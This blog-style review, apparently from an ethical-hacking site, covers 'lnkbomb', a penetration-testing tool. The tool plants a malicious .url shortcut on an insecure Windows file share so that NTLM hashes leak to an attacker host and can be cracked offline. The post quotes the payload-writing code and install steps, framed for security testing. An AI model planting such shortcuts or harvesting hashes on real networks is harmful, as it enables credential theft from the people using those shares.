Lnkbomb- Exploit Insecure File Shares

Today I have a tool that exploits insecure file shares and allows penetration testers to collect NTLMv1 or NTLMv2 hashes for offline cracking. The tool is called lnkbomb and was written in python by Dievus.

An example from the authors Git Hub repo

Exploiting Insecure File Shares

After discovering the insecure file share on the network the payload file of lnkbomb is uploaded directly to it- this means you need initial access. If you are in a white-box testing environment this will be an easy to use tool. Most penetration testers working in a black-box environment  would have various other methods for gathering this information, this is a very helpful tool to exploit the Windows CPLINK vulnerability.

It starts by uploading the payload directly to the file share. The penetration tester can do this from the command line using a python script or the lnkbomb.exe command on Windows.

with open(tar_dir, 'w', newline='\r\n') as payload_file
payload_file.write(f"[InternetShortcut]\nURL={args.attacker}\nWorkingDirectory=\\\\{args.attacker}\{directory}\nIconFile=\\\\{args.attacker}\{directory}.icon\nIconIndex=1")
print(f'Malicious shortcut named {file_name}.url created in the \\\\{args.target}\\{args.share} file share.\r\n')

After the file is created it is then stored on the insecure file share and when someone opens the file, a recovery file is created and stored on the attacker machine

with open(f'{file_name}.recovery', 'a+') as recovery_file:
recovery_file.write(f'\\{args.target}\{args.share}\{file_name}')
print(f'Recovery file {file_name}.recovery created in your current directory.\n'

The penetration tester can then collect NTLM hashes by running Responder or smbserver and then crack the hash offline with a tool like Hashcat.

Installing Lnkbomb

There are two ways to use lnkbomb listed in the README.md and both are very simple. You can clone the repository found here, and navigate to the download location and run the lnkbomb.py with your commands. The alternative is to download the latest release on the same git hub page but this is an executable file you need to unzip and run to install. After installing the .exe file you can navigate to where its downloaded, open a command line and use the same commands as the python script.

Conclusion

This tool would be very useful during a penetration test and is very easily installable. The author did stress that this tool may be a little buggy on Linux but I tested an install on our Kali WSL2 GUI and was able to generate the payload easily. This tool is walking away with a 4 out of 5 bunnies

Want to learn more about ethical hacking?

We have a  networking hacking course that is of a similar level to OSCP, get an exclusive discount here

Help support LHN by buying a T-shirt or a mug?

Check out our selection here

Do you know of another GitHub related hacking tool?

Get in touch with us via the contact form if you would like us to look at any other GitHub ethical hacking tools.

Related posts

BruteDum- A network attack bruteforce tool

MHDDoS – A DDoS Attack Script With Over 50 Different Methods

A Review of DNS Enumeration Tool: DNSEnum